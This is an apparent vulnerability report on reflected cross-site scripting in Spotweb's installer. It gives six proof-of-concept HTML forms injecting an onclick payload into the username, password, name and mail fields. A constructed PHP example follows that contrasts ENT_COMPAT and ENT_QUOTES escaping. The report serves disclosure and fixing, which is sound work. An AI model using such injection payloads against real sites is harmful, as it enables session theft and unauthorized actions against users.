Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser.
Note that multiple XSS vulnerabilities of this kind exist in Spotweb.
Have you searched the internet or Github for an answer?
Not related
To Reproduce
Steps to reproduce the behavior:
Go to the installation page
Complete the configuration including DB connection => go to step 4
Access each page of these HTML files.
Exploit 1 - exploit username parameter
<html><form method="POST" action="http://[localhost]/spotweb/install.php?page=4"><input name='settingsform[username]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 2 - exploit newpassword1 parameter
<html><form method="POST" action="http://[localhost]/spotweb/install.php?page=4"><input name='settingsform[newpassword1]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 3 - exploit newpassword2 parameter
<html><form method="POST" action="http://[localhost]/spotweb/install.php?page=4"><input name='settingsform[newpassword2]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 4 - exploit firstname parameter
<html><form method="POST" action="http://[localhost]/spotweb/install.php?page=4"><input name='settingsform[firstname]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 5 - exploit lastname parameter
<html><form method="POST" action="http://[localhost]/spotweb/install.php?page=4"><input name='settingsform[lastname]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 6 - exploit mail parameter
<html><form method="POST" action="http://[localhost]/spotweb/install.php?page=4"><input name='settingsform[mail]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Click each text field
Boom!
Expected behavior
This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim.
Screenshots
Desktop (please complete the following information):
(server) OS: ubuntu
(client) OS: Windows
Browser: Chrome
Spotweb Version: 1.5.1 and below
Which branch: Develop and Master
PHP version: 7.1
Additional context
The code below displays the user-controlled parameters username, newpassword1, newpassword2, firstname, lastname and mail with incorrect sanitization:
Yes, you are right. However, remember that XSS vulnerabilities that occur during the installation process are also vulnerabilities.
For example, in CVE-2021-37389, CVE-2014-9571, CVE-2020-26043, CVE-2020-18670, etc., you can see the vendors acknowledging that there are vulnerabilities.
The code below displays the user-controlled parameters username, newpassword1, newpassword2, firstname, lastname and mail with incorrect sanitization:
spotweb/templates/installer/step-004.inc.php
Line 41 in be2ab76
spotweb/templates/installer/step-004.inc.php
Line 46 in be2ab76
spotweb/templates/installer/step-004.inc.php
Line 51 in be2ab76
spotweb/templates/installer/step-004.inc.php
Line 56 in be2ab76
spotweb/templates/installer/step-004.inc.php
Line 61 in be2ab76
spotweb/templates/installer/step-004.inc.php
Line 66 in be2ab76
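The following is an added example, not code from the report or from Spotweb; the referenced template lines are not reproduced on this page. It assumes a field rendered into a single-quoted value attribute and compares htmlspecialchars with ENT_COMPAT (the default flag set before PHP 8.1) against ENT_QUOTES, using the value from the report's forms. The names render_field and has_event_handler are hypothetical.

```php
<?php
// Added example: constructed code, not Spotweb's step-004.inc.php.

// Constructed POST data carrying the value used in the report's forms.
$settingsform = ['username' => "1' onclick='alert(1)"];

// Hypothetical helper: renders one installer field with a single-quoted
// value attribute, escaping the value with the given htmlspecialchars flags.
function render_field(string $name, string $value, int $flags): string
{
    $escaped = htmlspecialchars($value, $flags, 'UTF-8');
    return "<input type='text' name='settingsform[{$name}]' value='{$escaped}'>";
}

// Parses the rendered markup and reports whether the input element ended up
// with an event-handler attribute (on*), i.e. the value left its attribute.
function has_event_handler(string $html): bool
{
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    foreach ($doc->getElementsByTagName('input') as $input) {
        foreach ($input->attributes as $attr) {
            if (stripos($attr->name, 'on') === 0) {
                return true;
            }
        }
    }
    return false;
}

// Weak: ENT_COMPAT escapes & < > " but leaves single quotes untouched.
$weak = render_field('username', $settingsform['username'], ENT_COMPAT | ENT_HTML401);
// Hardened: ENT_QUOTES also encodes ' as &#039;, so the value stays one attribute.
$safe = render_field('username', $settingsform['username'], ENT_QUOTES | ENT_SUBSTITUTE);

foreach (['ENT_COMPAT' => $weak, 'ENT_QUOTES' => $safe] as $label => $html) {
    printf("%-10s %s\n  event handler parsed: %s\n", $label, $html,
        has_event_handler($html) ? 'yes' : 'no');
}
```

The same check can be run against the rendered step 4 page after a fix to confirm that none of the six fields produces an extra attribute.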